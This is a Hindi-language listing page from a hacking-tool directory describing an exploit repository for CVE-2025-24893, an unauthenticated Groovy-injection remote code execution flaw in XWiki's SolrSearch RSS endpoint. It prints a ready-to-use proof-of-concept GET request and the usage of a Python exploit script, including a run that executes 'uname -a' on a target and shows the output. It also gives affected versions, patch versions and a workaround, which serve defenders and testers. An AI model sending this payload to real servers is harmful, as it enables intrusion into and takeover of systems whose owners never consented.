Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24893 | Kitploit
उपकरण/GitHubGitHub/b0ysie7e/cve-2025-24893
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

रिपॉजिटरी देखें
11311 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24893 के लिए एक्सप्लॉइट

CVE-2025-24893 एक गंभीर अनधिकृत रिमोट कोड निष्पादन (RCE) भेद्यता है जो XWiki Platform को प्रभावित करती है।
यह दोष किसी भी अतिथि उपयोगकर्ता को SolrSearch एंडपॉइंट पर विशेष रूप से तैयार किए गए RSS अनुरोध के माध्यम से—बिना प्रमाणीकरण के—मनमाना Groovy कोड इंजेक्ट और निष्पादित करने की अनुमति देता है।

यह सीधे प्रभावित सिस्टम की गोपनीयता, अखंडता और उपलब्धता पर असर डालता है।

सारांश

  • प्रभावित संस्करण:
    • XWiki ≥ 5.3-milestone-2 से < 15.10.11 तक
    • XWiki ≥ 16.0.0-rc-1 से < 16.4.1 तक
  • CVSS v3.1 स्कोर: 9.8 (गंभीर)
    वेक्टर: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • शोषण क्षमता: बहुत आसान — एक अकेला HTTP GET अनुरोध पर्याप्त है।

⚠️ अस्वीकरण:

यह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम पर अनधिकृत उपयोग कानून का उल्लंघन हो सकता है। लेखक इस टूल से जुड़े किसी भी दुरुपयोग या दुर्भावनापूर्ण गतिविधि के लिए ज़िम्मेदार नहीं है।

प्रमाण-अवधारणा (POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

एक्सप्लॉइट स्क्रिप्ट के लिए उपयोग नियमावली

यह अनुभाग बताता है कि CVE-2025-24893 का लाभ उठाने के लिए Python एक्सप्लॉइट स्क्रिप्ट को कैसे सेट अप और चलाएं।


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

शमन

स्थिर संस्करणों में अपडेट करें:

भेद्यता को पैच करने के लिए, XWiki को निम्नलिखित संस्करणों में से किसी एक में अपडेट करें:

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

अस्थायी कार्य समाधान:

यदि तत्काल अपडेट संभव नहीं है, तो आप अस्थायी सुधार लागू कर सकते हैं:

  1. SolrSearchMacros.xml फ़ाइल को संपादित करें (Main.SolrSearchMacros पर स्थित) लगभग पंक्ति 955 के आसपास।
  2. आउटपुट लॉजिक को rawResponse मैक्रो का उपयोग करने के लिए बदलें, जिसमें कंटेंट प्रकार application/xml सेट हो।
    संदर्भ के रूप में macros.vm में पंक्ति 2824 पर पाई जाने वाली कार्यान्वयन का उपयोग करें।

संदर्भ:

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
टूल डाउनलोड करें